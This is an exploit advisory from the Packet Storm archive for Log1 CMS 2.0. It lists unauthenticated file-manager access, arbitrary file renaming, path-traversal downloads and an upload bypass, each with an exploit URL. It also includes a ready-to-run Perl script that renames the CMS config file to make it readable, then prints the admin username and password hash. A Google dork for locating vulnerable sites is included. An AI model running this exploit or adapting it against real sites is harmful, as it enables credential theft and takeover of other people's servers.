exploit the possibilities

Log1 CMS File Modification / Download

Log1 CMS File Modification / Download
Posted Mar 15, 2011
Authored by Aodrulez

Log1 CMS suffers multiple security vulnerabilities including direct access to the AjaxFileManager without a session, arbitrary file renaming via ajax_save_name.php, and arbitrary file downloads.

tags | exploit, arbitrary, php, vulnerability
MD5 | e50d5b772bd8095530684e8b88877291

Log1 CMS File Modification / Download

Change Mirror Download
+---------------------------------------+
| Log1 CMS 2.0 Multiple Vulnerabilities |
+---------------------------------------+



Vulnerable Web-App : Log1 CMS 2.0
Vulnerability : Multiple Vulnerabilities.
Author : Aodrulez. (Atul Alex Cherian)
Email : f3arm3d3ar@gmail.com
Google-Dork : "POWERED BY LOG1 CMS"
Tested on : Ubuntu 10.04
Vendor : http://log1cms.sourceforge.net/


+---------+
| Details |
+---------+

This CMS suffers from multiple vulnerabilities.

1] "AjaxFileManager" implemented without the need for a valid session.
Path: http://localhost/admin/libraries/ajaxfilemanager/ajaxfilemanager.php

2] "ajax_save_name.php" can be used to rename any file on the system/www-root
to any name that contains safe extensions (txt,jpg etc)

3] "AjaxFileManager.php" allows download of even php files if its under the 'Root Folder'.
Exploit: http://localhost/admin/libraries/ajaxfilemanager/ajax_download.php?path=../../../db/uploaded/index.php

4] "main.php" can be used to upload any file-type as long as this is true : "Content-Type: image:jpeg"
Exploit:http://localhost/admin/main.php?action=upload



+--------------------+
| Exploit (Perl Code)|
+--------------------+
(This exploit will fetch Sensitive Login information
from 'http://target.com/admin/config.php' & trigger
DOS attack against the Web-Application)

use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP 5.64;
my $browser = LWP::UserAgent->new();
my $url=$ARGV[0];
print "+---------------------------------------+\n";
print "| Log1 CMS 2.0 Multiple Vulnerabilities |\n";
print "+---------------------------------------+\n\n";
print "Author : Aodrulez. (Atul Alex Cherian)\n";
print "Email : f3arm3d3ar\@gmail.com\n";
print "Google-Dork : \"POWERED BY LOG1 CMS\"\n";
if(!$url)
{die ("\nPlease enter the target url. Ex. perl $0 http://www.test.com");}
my $ajaxfileman='/admin/libraries/ajaxfilemanager/ajax_save_name.php';
$response = HTTP::Request->new(POST => $url.$ajaxfileman) or die("\n Connection Error!");
$response->content_type("application/x-www-form-urlencoded");
$response->content("original_path=../../../admin/config.php&name=config.txt");
my $data=$browser->request($response)->as_string;
if($data!~m/HTTP\/1.1 200 OK/){ die ("\n$url Not Vulnerable!\n");}
$response = HTTP::Request->new(GET => $url.'/admin/config.txt') or die("\n Connection Error!");
my $data=$browser->request($response)->as_string;
$data=~ m/\"(.*?)\";\r\n.*?\"(.*?)\";/g;
print "\nAdmin Username : ".$1."\nAdmin Password : ".$2." (MD5 Hash)\n";



+-------------------+
| Greetz Fly Out To |
+-------------------+


1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] www.malcon.org
5] www.isac.org.in


+-------+
| Quote |
+-------+

"Learn the Rules really well so you know how to Break them in Multiple Ways." - Aodrulez
;)



Login or Register to add favorites

File Archive:

July 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    12 Files
  • 3
    Jul 3rd
    1 Files
  • 4
    Jul 4th
    2 Files
  • 5
    Jul 5th
    34 Files
  • 6
    Jul 6th
    21 Files
  • 7
    Jul 7th
    21 Files
  • 8
    Jul 8th
    13 Files
  • 9
    Jul 9th
    6 Files
  • 10
    Jul 10th
    1 Files
  • 11
    Jul 11th
    3 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    19 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    15 Files
  • 16
    Jul 16th
    9 Files
  • 17
    Jul 17th
    2 Files
  • 18
    Jul 18th
    2 Files
  • 19
    Jul 19th
    19 Files
  • 20
    Jul 20th
    21 Files
  • 21
    Jul 21st
    53 Files
  • 22
    Jul 22nd
    14 Files
  • 23
    Jul 23rd
    14 Files
  • 24
    Jul 24th
    1 Files
  • 25
    Jul 25th
    1 Files
  • 26
    Jul 26th
    21 Files
  • 27
    Jul 27th
    8 Files
  • 28
    Jul 28th
    9 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close